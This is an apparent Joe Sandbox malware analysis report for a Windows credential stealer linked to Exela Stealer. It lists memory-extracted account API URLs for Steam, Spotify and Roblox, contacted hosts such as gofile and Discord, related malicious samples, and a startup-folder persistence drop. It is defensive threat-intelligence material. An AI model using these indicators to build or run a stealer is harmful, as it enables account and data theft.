https://github.com/python-attrs/attrs	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.spotify.com/api/account-settings/v1/profile	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	9afaXJv52z.exe, 00000002.00000003.1562825975.0000020DADA5E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1549460513.0000020DAD9CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1271340461.0000020DADA56000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551519876.0000020DADA25000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000002.1570067945.0000020DADA5F000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548937201.0000020DAD8EA000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1551014490.0000020DAD9D0000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1562091332.0000020DADA28000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/quicaxd/Exela-V2.0/Exela-V2.0	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://hynek.me/articles/import-attrs/)	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://cryptography.io/en/latest/changelog/	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization).	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://www.roblox.com/my/account/json	9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.aiohttp.org/en/stable/client_advanced.html#proxy-support	9afaXJv52z.exe, 00000002.00000002.1571769421.0000020DADFC9000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543495098.0000020DADFC6000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.attrs.org/en/stable/changelog.html)	METADATA.0.dr	false		high
http://www.iana.org/time-zones/repository/tz-link.html	9afaXJv52z.exe, 00000002.00000003.1261155792.0000020DADA11000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262454309.0000020DAD8CF000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261382928.0000020DAD8D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1261203092.0000020DAD8AD000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1262711651.0000020DAD8DA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mail.python.org/mailman/listinfo/cryptography-dev	9afaXJv52z.exe, 00000000.00000003.1247744943.00000170C08E8000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr	false		high
https://media.discordapp.net/attachments/1133692440029700117/1140245373496074270/195198d656ec1e2b59a	9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548453854.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl4.digice	9afaXJv52z.exe, 00000000.00000003.1249389490.00000170C08F2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.attrs.org/en/stable/comparison.html#customization)	9afaXJv52z.exe, 00000000.00000003.1246202289.00000170C08E5000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000000.00000003.1246151956.00000170C08EC000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr	false		high
https://github.com/quicaxd/Exela-V2.0	9afaXJv52z.exe, 00000002.00000003.1543296024.0000020DADF4C000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1548453854.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE27000.00000004.00000020.00020000.00000000.sdmp, 9afaXJv52z.exe, 00000002.00000003.1556804989.0000020DAE6D8000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
162.159.136.232	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.128.233	discord.com	United States	13335	CLOUDFLARENETUS	false
51.38.43.18	api.gofile.io	France	16276	OVHFR	false
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)	199483	LINKER-ASFR	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1374178
Start date and time:	2024-01-13 06:49:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	79
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	9afaXJv52z.exe renamed because original name is a hash value
Original Sample Name:	ca120c365ddd0e24311e36e1ec5d4af6db21b0f2ebd6f7dfd0d6a3a730621367.exe
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winEXE@124/95@4/6
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 42 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.221.242.90
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 1240 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:50:06	API Interceptor	5x Sleep call for process: WMIC.exe modified
06:50:16	API Interceptor	2x Sleep call for process: svchost.exe modified
06:50:17	API Interceptor	7x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	XosqvD3TNK.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	ip-api.com/line/?fields=hosting
	4ac7d8a9a14447f7e60f14699384b340ef2564e6fad91727a0f3f2706c726b03_dump.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	ip-api.com/line/?fields=hosting
	n1xXsLg7CL.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	Cheat.Lab.2.7.2.msi	Get hash	malicious	RedLine, zgRAT	Browse	ip-api.com/json/?fields=query,status,countryCode,city,timezone
	file.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Agonied_Grabber_V2.4.exe	Get hash	malicious	Blank Grabber	Browse	ip-api.com/json/?fields=225545
	RGyT9gS5Wp.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	FedEx_AWB#_8116010123507.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG2110017156060.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211003417156060.xla.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211001715606.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	e-dekont.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	051223_JOK_JOKSP67123_MSI_-_Marine_Spares_International.xls.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	MV_CHARLENE_DETAILS.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Notificaci#U00f3n_Transferencia_Interbancaria.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	ip-api.com/line/?fields=hosting
	PO-001.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	rRecibodeenv__o.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	hpS52BJbZU.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	iLN07Ke3n1.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
store4.gofile.io	NoBackend.exe	Get hash	malicious	Unknown	Browse	31.14.70.245
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
	GameInject.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	KfpMPicGie.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	Install.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	a79qM8CfJQ.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	6F8D6E43D0D509A1223346B2F29E4E775384A4CB15A7AB1CF3AC702A772F73D7_noOVL.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	v6aF6opW6c.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	jF6G4Ur9fw.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse	31.14.70.245
	conhost.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	setup.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	E9IOqND6ov.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	9844_1647755927_4424.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	uOItzWogCB.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
	43234607.exe	Get hash	malicious	AsyncRAT RedLine	Browse	31.14.70.245
	40905558.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
	31201672.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
discord.com	bubblescat.exe	Get hash	malicious	Luna Logger	Browse	162.159.135.232
	Agonied_Grabber_V2.4.exe	Get hash	malicious	Blank Grabber	Browse	162.159.138.232
	photo-y.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, Empyrean	Browse	162.159.128.233
	photo-y.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, Empyrean	Browse	162.159.137.232
	2h5FeuV9qO.exe	Get hash	malicious	AgentTesla	Browse	162.159.138.232
	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse	162.159.137.232
	main.exe	Get hash	malicious	Discord Token Stealer	Browse	162.159.135.232
	xqT17KMTlU.exe	Get hash	malicious	AgentTesla	Browse	162.159.138.232
	Stubakion502.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	import_order.scr.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	SecuriteInfo.com.Trojan.DownLoader45.55850.18837.22068.exe	Get hash	malicious	Unknown	Browse	162.159.135.232
	https://pub-15db00048d8c4dada9be9ffcfd12adc9.r2.dev/index.html	Get hash	malicious	AsyncRAT, StormKitty, Strela Stealer, VenomRAT	Browse	162.159.138.232
	10cae0676fcf60dbbb56266448fff13a2ed236753243f.exe	Get hash	malicious	Remcos, AsyncRAT, DcRat, Discord Token Stealer, Orcus	Browse	162.159.128.233
	forcephilosophy.exe	Get hash	malicious	Creal Stealer	Browse	162.159.136.232
	sdfscvxsdf.exe	Get hash	malicious	Creal Stealer	Browse	162.159.138.232
	z47orderdetails.scr.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	edge.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	n51eKFnj1G.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	dHDIRwq2tc.exe	Get hash	malicious	Blank Grabber, HTMLPhisher, Umbral Stealer	Browse	162.159.137.232
	https://pub-2dc4e3b2817c45f8af7172240c8fb675.r2.dev/newweb.html#nobody@fuckoff.org	Get hash	malicious	Unknown	Browse	162.159.128.233

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PARKINGLIST_&_ORIGINAL_BL.vbs	Get hash	malicious	Unknown	Browse	104.22.52.71
	DHL_AWB,COMMERCIAL_INVOICE.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	New_Order.xls	Get hash	malicious	AgentTesla	Browse	104.22.52.71
	Booking.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	facturas_y_datos_bancarios.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	https://publuu.com/flip-book/362236/826905	Get hash	malicious	Unknown	Browse	104.21.81.254
	https://hwhk.steamproxy.vip/	Get hash	malicious	Unknown	Browse	172.64.145.151
	https://awrs.cl/wp-content/themes/form/bill.charged.html	Get hash	malicious	Unknown	Browse	172.67.20.158
	PYMT_SUCESSFUL_AVIS_CREDIT_12012024.exe	Get hash	malicious	GuLoader	Browse	104.21.53.32
	https://xien-olwia-27a8ha7ga7dh38sj2gv26gsjj2kzam68msk3iiofff02ua.pages.dev/robots.txt	Get hash	malicious	Unknown	Browse	172.66.44.242
	https://jkhiuiiugiugiigutturdturdutrdturdt.pages.dev/aec0eorugW20bgX6j/	Get hash	malicious	TechSupportScam	Browse	172.66.44.212
	https://currently000112.square.site/	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://usps.redelivery-secured.103-23-199-211.cprapid.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://0c20ao28371yaha2jak22gaj3cabbe6jsjs936ay3.pages.dev/	Get hash	malicious	Unknown	Browse	172.66.47.177
	https://protections.load-document.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.21.61.252
	https://web-dappfixs.pages.dev/pages/connection-module/	Get hash	malicious	Unknown	Browse	172.66.44.179
	https://ziraat-ba.com/	Get hash	malicious	Unknown	Browse	104.21.16.118
	https://mhgfdszxfgh876.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	104.18.24.163
	https://support-business-community.help/meta-community-support/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://sechoparli.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
TUT-ASUS	XosqvD3TNK.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	208.95.112.1
	4ac7d8a9a14447f7e60f14699384b340ef2564e6fad91727a0f3f2706c726b03_dump.exe	Get hash	malicious	SmokeLoader, XWorm	Browse	208.95.112.1
	n1xXsLg7CL.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	Cheat.Lab.2.7.2.msi	Get hash	malicious	RedLine, zgRAT	Browse	208.95.112.1
	file.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Agonied_Grabber_V2.4.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	RGyT9gS5Wp.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	FedEx_AWB#_8116010123507.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG2110017156060.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211003417156060.xla.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Recibo_de_env#U00edo_de_DHL_Gu#U00eda_de_embarque_Doc_PRG211001715606.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	e-dekont.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	Complexcaresolutions-ACH#80908.hTml	Get hash	malicious	HTMLPhisher	Browse	208.95.112.2
	https://r20.rs6.net/tn.jsp?f=0014g8CimRsyfsXhRcokS4gCGfNQQGnJnYWf2D3I4dBh7hSeER3X0T-g-BR44FifTHYOMOheYbnWB5duWTQ7ZE2GLeKzS3RgXmolpTBnsvpJRfEQRFdVlRBOFenEvkJVsG60XzEapPM_rp-2eqQc0ASO-2Sx6tVG2MICOpELsnkP7OSvLjzNsvV9Q==&c=&ch==&__=/asdf/YnJ5Y2Uuam9obnNvbkBzdGVwYW4uY29t	Get hash	malicious	HTMLPhisher	Browse	208.95.112.2
	051223_JOK_JOKSP67123_MSI_-_Marine_Spares_International.xls.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	MV_CHARLENE_DETAILS.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Notificaci#U00f3n_Transferencia_Interbancaria.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	17049844844c91418df05caa784d7b01efd38530d3b9f4085141b3efa51b2282b1bd03abee258.dat-decoded.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	208.95.112.1
	PO-001.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	https://r20.rs6.net/tn.jsp?f=001hpH3iFffMveYjStO_X-MvG9RPTAIiC6hH4aTZU7rVzcpvUP_ICqo36RUMXQVfsUqrm4g7z-3oSj0KQANPFyd7MBjWWS-bv6QWs7PqyxIwA-IwCQs4kQi1tfcYzCaVnvmTt7ZwML9C70thbxO1_yIGfcUEvxfwQDq&__=bkorn@drinkbodyarmor.com	Get hash	malicious	HTMLPhisher	Browse	208.95.112.2
CLOUDFLARENETUS	PARKINGLIST_&_ORIGINAL_BL.vbs	Get hash	malicious	Unknown	Browse	104.22.52.71
	DHL_AWB,COMMERCIAL_INVOICE.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	New_Order.xls	Get hash	malicious	AgentTesla	Browse	104.22.52.71
	Booking.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	facturas_y_datos_bancarios.vbs	Get hash	malicious	Unknown	Browse	104.21.84.67
	https://publuu.com/flip-book/362236/826905	Get hash	malicious	Unknown	Browse	104.21.81.254
	https://hwhk.steamproxy.vip/	Get hash	malicious	Unknown	Browse	172.64.145.151
	https://awrs.cl/wp-content/themes/form/bill.charged.html	Get hash	malicious	Unknown	Browse	172.67.20.158
	PYMT_SUCESSFUL_AVIS_CREDIT_12012024.exe	Get hash	malicious	GuLoader	Browse	104.21.53.32
	https://xien-olwia-27a8ha7ga7dh38sj2gv26gsjj2kzam68msk3iiofff02ua.pages.dev/robots.txt	Get hash	malicious	Unknown	Browse	172.66.44.242
	https://jkhiuiiugiugiigutturdturdutrdturdt.pages.dev/aec0eorugW20bgX6j/	Get hash	malicious	TechSupportScam	Browse	172.66.44.212
	https://currently000112.square.site/	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://usps.redelivery-secured.103-23-199-211.cprapid.com/	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://0c20ao28371yaha2jak22gaj3cabbe6jsjs936ay3.pages.dev/	Get hash	malicious	Unknown	Browse	172.66.47.177
	https://protections.load-document.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.21.61.252
	https://web-dappfixs.pages.dev/pages/connection-module/	Get hash	malicious	Unknown	Browse	172.66.44.179
	https://ziraat-ba.com/	Get hash	malicious	Unknown	Browse	104.21.16.118
	https://mhgfdszxfgh876.pages.dev/robots.txt	Get hash	malicious	HTMLPhisher	Browse	104.18.24.163
	https://support-business-community.help/meta-community-support/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://sechoparli.com	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	VfCch0oSlP.exe	Get hash	malicious	Python Stealer	Browse
	SecuriteInfo.com.Win64.Evo-gen.10784.13987.exe	Get hash	malicious	Python Stealer	Browse
	SilentAim.exe	Get hash	malicious	Unknown	Browse
	yXLOWtfvSd.exe	Get hash	malicious	Unknown	Browse
	hh.hta	Get hash	malicious	Unknown	Browse
	hhh.hta	Get hash	malicious	Unknown	Browse
	Windows.exe	Get hash	malicious	Unknown	Browse
	explorer.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	D3C3.exe	Get hash	malicious	Unknown	Browse
	nudes.scr.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	wechat_XC560-1.exe	Get hash	malicious	Unknown	Browse
	trac.exe	Get hash	malicious	Blank Grabber	Browse
	1.js	Get hash	malicious	Unknown	Browse
	1.js	Get hash	malicious	Unknown	Browse
	SecuriteInfo.com.Python.Muldrop.18.32423.7935.exe	Get hash	malicious	Blank Grabber	Browse
	SecuriteInfo.com.Python.Muldrop.18.32423.7935.exe	Get hash	malicious	Blank Grabber	Browse
	capthca-bypass.exe	Get hash	malicious	Exela Stealer	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067072127746348
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqf:2JIB/wUKUKQncEmYRTwh0r
MD5:	37E8CF90C374FE782ADE516765753960
SHA1:	DD0D6A2AEEA3532432D46A9C549B71C3C7B165D9
SHA-256:	A2F0819E381DFAA9EF684980B46D00175A129C5E99D45F7D922940546CE95B5E
SHA-512:	B26374F63D3715192634D616AB2FD2CADAB43AE311F314930A59B9ED64C72D9B4FDAD10980C607276BFBA58A2E03EC39C06CFF94966EA928369D90B4C7E0BDED
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x9fe46925, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7899743599956502
Encrypted:	false
SSDEEP:	1536:zSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:zazaPvgurTd42UgSii
MD5:	FC51B6FF1E4A54258E72B4E5C7DFDFB5
SHA1:	2A9BCAF2385A18BD5CAE11A30AB661121EB6DAAB
SHA-256:	0E6F42AEF866E7E1EB224B8A789171B7CD159BEBDCDC66C504743F579E4A961D
SHA-512:	1E7566E92EA887D56E968DAAB912E927EC4E161EAB80CE1BFD986BF5A1643E5CB2F140F6867E0846B9AA7FA083F69B19B4225F7D071E92BCD59CA612FD4EFEB7
Malicious:	false
Preview:	..i%... ...............X\...;...{......................0.`.....42...{5..2...\|#.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{...................................j...2...\|C..................T...2...\|C..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08211667046995741
Encrypted:	false
SSDEEP:	3:Lm1KYeCdket/57Dek3Jbw5ZK/allEqW3l/TjzzQ/t:2Kz2vR3tMLmd8/
MD5:	EFFCD387C62ECC536698D35BAB61CD57
SHA1:	1800AE68A865EFECF2A106D714EBCC014731CAE0
SHA-256:	0DBE08CD0D3D70D56FF1BDDC8DC163880D9EDCD084826D9EBEFA5C9D7F108592
SHA-512:	063FAEF91B06CDA2031B5218EC3F0842DBB0E59DE35DA9D031ABA1EBE51E6F465C0444F66498527F8DD85998026529BF62347FA16F316DD4DE0F4853381160CA
Malicious:	false
Preview:	lr.......................................;...{...2...\|C.42...{5.........42...{5.42...{5...Y.42...{59.................T...2...\|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	16417517
Entropy (8bit):	6.304218706058302
Encrypted:	false
SSDEEP:	196608:ZqqMPAEuton3dDTeeNy+wfm/pf+xfdkRuBnfXWK6tSDrIWOIWsDaqkH:lDtet5y+9/pWFGREnfXBPDrIW1TaDH
MD5:	4D70F444794DEDF45C2A6562D4EAED19
SHA1:	337A7A9BE709B1A3F848256C9E4A421911C265BE
SHA-256:	CA120C365DDD0E24311E36E1EC5D4AF6DB21B0F2EBD6F7DFD0D6A3A730621367
SHA-512:	846ED7F6FBDF15CCB13D3DEE5261357E8D3EFCF8FC0A804CCB0CFAFA166D89BA68D688AF51D36468C8ACD4B66DC209BA5475784ED88FE8EFF12C39D0E9FAAD01
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 65%, Browse
